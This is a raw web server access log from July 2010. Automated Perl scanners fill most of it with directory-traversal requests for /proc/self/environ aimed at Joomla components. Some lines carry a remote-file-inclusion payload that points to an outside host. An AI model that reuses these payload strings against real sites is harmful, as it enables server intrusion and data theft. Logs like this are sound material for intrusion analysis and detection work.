81.21.78.22 - - [26/Jul/2010:11:24:39 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:32:01 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:32:01 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:11:32:02 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
76.242.100.234 - - [26/Jul/2010:11:42:13 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:11:42:24 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.831"
174.142.75.205 - - [26/Jul/2010:11:42:53 +0200] "GET /logs/access_log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.805"
174.142.75.205 - - [26/Jul/2010:11:42:53 +0200] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 336 "-" "libwww-perl/5.805"
174.142.75.205 - - [26/Jul/2010:11:42:53 +0200] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
95.108.150.235 - - [26/Jul/2010:11:44:30 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:31 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
95.108.150.235 - - [26/Jul/2010:11:44:32 +0200] "GET / HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)"
74.55.73.74 - - [26/Jul/2010:11:45:43 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:45:43 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:11:45:43 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
110.45.144.106 - - [26/Jul/2010:11:49:03 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:49:19 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:51:28 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:51:28 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:51:29 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:51:32 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:58:43 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:11:59:06 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:02:47 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:02:48 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:02:48 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:34 +0200] "GET /logs/access_log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:35 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:03:35 +0200] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
81.21.78.22 - - [26/Jul/2010:12:03:40 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
92.241.190.214 - - [26/Jul/2010:12:03:40 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
81.21.78.22 - - [26/Jul/2010:12:03:42 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
110.45.144.106 - - [26/Jul/2010:12:04:16 +0200] "GET //index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:06:34 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:06:35 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
110.45.144.106 - - [26/Jul/2010:12:06:35 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
91.121.7.123 - - [26/Jul/2010:12:09:26 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:09:26 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:09:29 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:09:29 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:12:09:31 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:09:32 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:09:33 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:09:34 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:09:35 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:09:36 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:10:08 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:10:08 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
211.189.18.186 - - [26/Jul/2010:12:10:08 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
89.200.169.163 - - [26/Jul/2010:12:10:08 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
211.189.18.186 - - [26/Jul/2010:12:10:09 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:12:10:10 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:10:10 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:10:11 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:10:25 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:10:26 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:12:10:30 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
64.34.172.171 - - [26/Jul/2010:12:10:30 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:10:31 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:10:31 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
91.121.7.123 - - [26/Jul/2010:12:10:34 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
64.34.172.171 - - [26/Jul/2010:12:10:37 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:10:38 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
89.200.169.163 - - [26/Jul/2010:12:10:38 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:12:12:24 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:12:25 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:12:25 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
64.34.172.171 - - [26/Jul/2010:12:12:31 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:12:31 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:12:31 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
91.121.7.123 - - [26/Jul/2010:12:12:48 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:12:49 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:12:49 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:12:13:39 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:13:39 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:13:39 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
64.34.172.171 - - [26/Jul/2010:12:13:46 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:13:47 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:13:47 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:14:20 +0200] "GET /logs/access_log//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:14:20 +0200] "GET //index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:12:14:20 +0200] "GET /logs//index.php?option=com_addressbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
81.21.78.22 - - [26/Jul/2010:12:22:27 +0200] "GET /logs/error_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:22:27 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:22:27 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:22:27 +0200] "GET /logs/error_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:22:27 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:12:22:28 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
195.186.81.78 - - [26/Jul/2010:12:31:45 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:31:47 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.808"
91.121.7.123 - - [26/Jul/2010:12:35:31 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:35:32 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:12:36:35 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:36:35 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:36:36 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:36:36 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
91.121.7.123 - - [26/Jul/2010:12:36:40 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:36:51 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:37:04 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:47 +0200] "GET /logs/access_log//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:47 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:48 +0200] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:48 +0200] "GET /logs/access_log//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:49 +0200] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.808"
195.186.81.78 - - [26/Jul/2010:12:37:49 +0200] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:38:06 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:38:07 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:38:09 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:38:09 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
92.241.190.214 - - [26/Jul/2010:12:38:58 +0200] "GET /logs/error_log///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
92.241.190.214 - - [26/Jul/2010:12:38:58 +0200] "GET ///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.241.190.214 - - [26/Jul/2010:12:38:58 +0200] "GET /logs///index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
91.121.7.123 - - [26/Jul/2010:12:39:37 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:40:09 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:40:09 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
91.121.7.123 - - [26/Jul/2010:12:40:38 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:40:38 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:40:38 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:42:57 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:42:57 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:42:58 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:43:08 +0200] "GET /logs/access_log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:43:08 +0200] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:43:09 +0200] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
91.121.7.123 - - [26/Jul/2010:12:43:19 +0200] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:43:19 +0200] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:12:43:20 +0200] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:43:20 +0200] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:43:20 +0200] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:12:43:20 +0200] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
91.121.7.123 - - [26/Jul/2010:12:46:39 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:46:39 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:46:40 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:12:49:57 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:12:49:57 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
91.121.7.123 - - [26/Jul/2010:12:50:10 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:12:50:10 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
89.200.169.163 - - [26/Jul/2010:12:50:18 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
